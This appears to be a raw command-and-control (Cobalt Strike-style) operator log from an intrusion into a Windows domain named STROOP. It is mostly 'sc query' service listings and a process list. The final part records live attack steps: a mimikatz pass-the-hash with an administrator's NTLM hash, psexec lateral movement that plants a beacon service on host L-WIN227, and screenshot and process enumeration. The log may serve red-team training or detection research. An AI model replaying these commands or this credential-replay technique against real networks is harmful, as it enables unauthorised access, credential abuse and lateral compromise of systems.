(0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: pla +DISPLAY_NAME: Performance Logs & Alerts + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: PlugPlay +DISPLAY_NAME: Plug and Play + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: PolicyAgent +DISPLAY_NAME: IPsec Policy Agent + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Power +DISPLAY_NAME: Power + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ProfSvc +DISPLAY_NAME: User Profile Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RdAgent +DISPLAY_NAME: RdAgent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RpcEptMapper +DISPLAY_NAME: RPC Endpoint Mapper + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RpcSs +DISPLAY_NAME: Remote Procedure Call (RPC) + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SamSs +DISPLAY_NAME: Security Accounts Manager + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Schedule +DISPLAY_NAME: Task Scheduler + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SecurityHealthService +DISPLAY_NAME: Windows Security Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SENS +DISPLAY_NAME: System Event Notification Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SessionEnv +DISPLAY_NAME: Remote Desktop Configuration + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SgrmBroker +DISPLAY_NAME: System Guard Runtime Monitor Broker + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ShellHWDetection +DISPLAY_NAME: Shell Hardware Detection + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Spooler +DISPLAY_NAME: Print Spooler + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SSDPSRV +DISPLAY_NAME: SSDP Discovery + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: StateRepository +DISPLAY_NAME: State Repository Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: StorSvc +DISPLAY_NAME: Storage Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SysMain +DISPLAY_NAME: SysMain + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: sysmon64 +DISPLAY_NAME: sysmon64 + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SystemEventsBroker +DISPLAY_NAME: System Events Broker + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TabletInputService +DISPLAY_NAME: Touch Keyboard and Handwriting Panel Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TermService +DISPLAY_NAME: Remote Desktop Services + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Themes +DISPLAY_NAME: Themes + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TimeBrokerSvc +DISPLAY_NAME: Time Broker + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TokenBroker +DISPLAY_NAME: Web Account Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TrkWks +DISPLAY_NAME: Distributed Link Tracking Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UmRdpService +DISPLAY_NAME: Remote Desktop Services UserMode Port Redirector + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UserManager +DISPLAY_NAME: User Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UsoSvc +DISPLAY_NAME: Update Orchestrator Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: VaultSvc +DISPLAY_NAME: Credential Manager + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicheartbeat +DISPLAY_NAME: Hyper-V Heartbeat Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmickvpexchange +DISPLAY_NAME: Hyper-V Data Exchange Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicrdv +DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicshutdown +DISPLAY_NAME: Hyper-V Guest Shutdown Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmictimesync +DISPLAY_NAME: Hyper-V Time Synchronization Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicvss +DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: VSS +DISPLAY_NAME: Volume Shadow Copy + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: W32Time +DISPLAY_NAME: Windows Time + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Wcmsvc +DISPLAY_NAME: Windows Connection Manager + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WdiServiceHost +DISPLAY_NAME: Diagnostic Service Host + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WinDefend +DISPLAY_NAME: Windows Defender Antivirus Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureGuestAgent +DISPLAY_NAME: Windows Azure Guest Agent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureNetAgentSvc +DISPLAY_NAME: Windows Azure Network Agent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureTelemetryService +DISPLAY_NAME: Windows Azure Telemetry Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WinHttpAutoProxySvc +DISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Winmgmt +DISPLAY_NAME: Windows Management Instrumentation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WinRM +DISPLAY_NAME: Windows Remote Management (WS-Management) + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WpnService +DISPLAY_NAME: Windows Push Notifications System Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: wscsvc +DISPLAY_NAME: Security Center + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WSearch +DISPLAY_NAME: Windows Search + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: cbdhsvc_12420b +DISPLAY_NAME: Clipboard User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CDPUserSvc_12420b +DISPLAY_NAME: Connected Devices Platform User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: OneSyncSvc_12420b +DISPLAY_NAME: Sync Host_12420b + TYPE : e0 USER_SHARE_PROCESS INSTANCE + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WpnUserService_12420b +DISPLAY_NAME: Windows Push Notifications User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + + +03/30 08:59:52 UTC [input] run sc query netsrv +03/30 08:59:52 UTC [task] Tasked beacon to run: sc query netsrv +03/30 08:59:55 UTC [checkin] host called home, sent: 33 bytes +03/30 08:59:55 UTC [output] +received output: + +SERVICE_NAME: netsrv + TYPE : 10 WIN32_OWN_PROCESS + STATE : 1 STOPPED + WIN32_EXIT_CODE : 1077 (0x435) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + + +03/30 09:00:20 UTC [input] run sc start netsrv +03/30 09:00:20 UTC [task] Tasked beacon to run: sc start netsrv +03/30 09:00:23 UTC [checkin] host called home, sent: 33 bytes +03/30 09:00:23 UTC [output] +received output: + +SERVICE_NAME: netsrv + TYPE : 10 WIN32_OWN_PROCESS + STATE : 2 START_PENDING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x7d0 + PID : 5880 + FLAGS : + + +03/30 09:03:59 UTC [input] rev2self +03/30 09:03:59 UTC [task] Tasked beacon to revert token +03/30 09:03:59 UTC [input] pth STROOP\admin-W.Trommel e4a22d8e7bbec871b341c88c2e94cba2 +03/30 09:04:00 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:admin-W.Trommel /domain:STROOP /ntlm:e4a22d8e7bbec871b341c88c2e94cba2 /run:"%COMSPEC% /c echo fb52ae3c198 > \\.\pipe\b2ebc7" command +03/30 09:04:00 UTC [input] jump psexec64 L-WIN227 smb +03/30 09:04:00 UTC [task] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) on L-WIN227 via Service Control Manager (\\L-WIN227\ADMIN$\203b554.exe) +03/30 09:04:00 UTC [indicator] service: \\L-WIN227 203b554 +03/30 09:04:00 UTC [indicator] file: 10ba5a6a5e0316fedf7fd10d257b3f91 289280 bytes \\L-WIN227\ADMIN$\203b554.exe +03/30 09:04:03 UTC [checkin] host called home, sent: 706862 bytes +03/30 09:04:07 UTC [output] +Impersonated STROOP\W.Tax + +03/30 09:04:07 UTC [output] +received output: +Started service 203b554 on L-WIN227 + +03/30 09:04:07 UTC [output] +established link to child beacon: 10.1.4.10 + +03/30 09:04:07 UTC [output] +received output: +user : admin-W.Trommel +domain : STROOP +program : C:\windows\system32\cmd.exe /c echo fb52ae3c198 > \\.\pipe\b2ebc7 +impers. : no +NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + | PID 376 + | TID 7096 + | LSA Process is now R/W + | LUID 0 ; 2756941 (00000000:002a114d) + \_ msv1_0 - data copy @ 0000013F1A4BC280 : OK ! + \_ kerberos - data copy @ 0000013F1A4CE8D8 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 0000013F1A02BA58 (32) -> null + + +03/30 09:04:37 UTC [input] screenshot +03/30 09:04:37 UTC [task] Tasked beacon to take screenshot +03/30 09:04:38 UTC [input] ps +03/30 09:04:38 UTC [task] Tasked beacon to list processes +03/30 09:04:46 UTC [checkin] host called home, sent: 197210 bytes +03/30 09:04:53 UTC [output] +[System Process] 0 0 +System 0 4 x64 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 504 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 504 584 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 576 592 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 576 676 x64 NT AUTHORITY\SYSTEM 1 +services.exe 584 692 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 584 724 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 676 840 x64 Font Driver Host\UMFD-1 1 +fontdrvhost.exe 584 848 x64 Font Driver Host\UMFD-0 0 +svchost.exe 692 916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 956 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 676 508 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 676 744 x64 Window Manager\DWM-1 1 +svchost.exe 692 932 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 972 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1092 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1100 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1132 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1168 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1224 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1288 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1296 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1476 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1496 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1668 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1680 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1752 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1760 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1788 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1888 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1936 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1084 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1448 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1452 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2004 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2208 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2236 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 692 2248 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2256 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2344 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2384 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2432 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2480 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2652 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2756 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2764 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2772 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2780 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2892 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 692 2972 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3092 x64 NT AUTHORITY\NETWORK SERVICE 0 +OfficeClickToRun.exe 692 3104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3112 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3132 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 3200 x64 NT AUTHORITY\SYSTEM 0 +WaAppAgent.exe 692 3220 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 692 3236 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 692 3304 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3312 x64 NT AUTHORITY\LOCAL SERVICE 0 +MsMpEng.exe 692 3324 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureNetAgent.exe 692 3340 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 692 3364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3372 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3380 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 3444 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3540 x64 NT AUTHORITY\LOCAL SERVICE 0 